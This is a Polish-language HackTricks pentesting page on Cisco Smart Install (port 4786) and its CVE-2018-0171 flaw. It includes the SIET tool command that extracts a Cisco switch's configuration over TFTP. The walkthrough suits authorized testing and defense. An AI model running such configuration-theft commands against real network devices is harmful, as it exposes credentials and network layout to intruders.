mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
41 lines
2.2 KiB
Markdown
41 lines
2.2 KiB
Markdown
# 4786 - Cisco Smart Install
|
||
|
||
{{#include ../banners/hacktricks-training.md}}
|
||
|
||
|
||
## Podstawowe informacje
|
||
|
||
**Cisco Smart Install** to rozwiązanie zaprojektowane przez Cisco w celu automatyzacji początkowej konfiguracji i ładowania obrazu systemu operacyjnego dla nowego sprzętu Cisco. **Domyślnie Cisco Smart Install jest aktywne na sprzęcie Cisco i używa protokołu warstwy transportowej, TCP, z numerem portu 4786.**
|
||
|
||
**Domyślny port:** 4786
|
||
```
|
||
PORT STATE SERVICE
|
||
4786/tcp open smart-install
|
||
```
|
||
## **Narzędzie do Eksploatacji Smart Install**
|
||
|
||
**W 2018 roku odkryto krytyczną lukę, CVE-2018–0171, w tym protokole. Poziom zagrożenia wynosi 9.8 w skali CVSS.**
|
||
|
||
**Specjalnie skonstruowany pakiet wysłany na port TCP/4786, gdzie aktywne jest Cisco Smart Install, wywołuje przepełnienie bufora, co pozwala atakującemu na:**
|
||
|
||
- wymuszenie ponownego uruchomienia urządzenia
|
||
- wywołanie RCE
|
||
- kradzież konfiguracji sprzętu sieciowego.
|
||
|
||
**Narzędzie** [**SIET**](https://github.com/frostbits-security/SIET) **(Narzędzie do Eksploatacji Smart Install)** zostało opracowane w celu wykorzystania tej luki, pozwala na nadużycie Cisco Smart Install. W tym artykule pokażę, jak możesz odczytać legalny plik konfiguracyjny sprzętu sieciowego. Konfiguracja eksfiltracji może być cenna dla pentestera, ponieważ pozwoli mu poznać unikalne cechy sieci. A to ułatwi życie i pozwoli znaleźć nowe wektory ataku.
|
||
|
||
**Docelowym urządzeniem będzie "żywy" przełącznik Cisco Catalyst 2960. Obrazy wirtualne nie mają Cisco Smart Install, więc możesz ćwiczyć tylko na rzeczywistym sprzęcie.**
|
||
|
||
Adres docelowego przełącznika to **10.10.100.10 i CSI jest aktywne.** Załaduj SIET i rozpocznij atak. **Argument -g** oznacza eksfiltrację konfiguracji z urządzenia, **argument -i** pozwala ustawić adres IP podatnego celu.
|
||
```
|
||
~/opt/tools/SIET$ sudo python2 siet.py -g -i 10.10.100.10
|
||
```
|
||
<figure><img src="../images/image (773).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
Konfiguracja przełącznika **10.10.100.10** będzie w folderze **tftp/**
|
||
|
||
<figure><img src="../images/image (1116).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
|
||
{{#include ../banners/hacktricks-training.md}}
|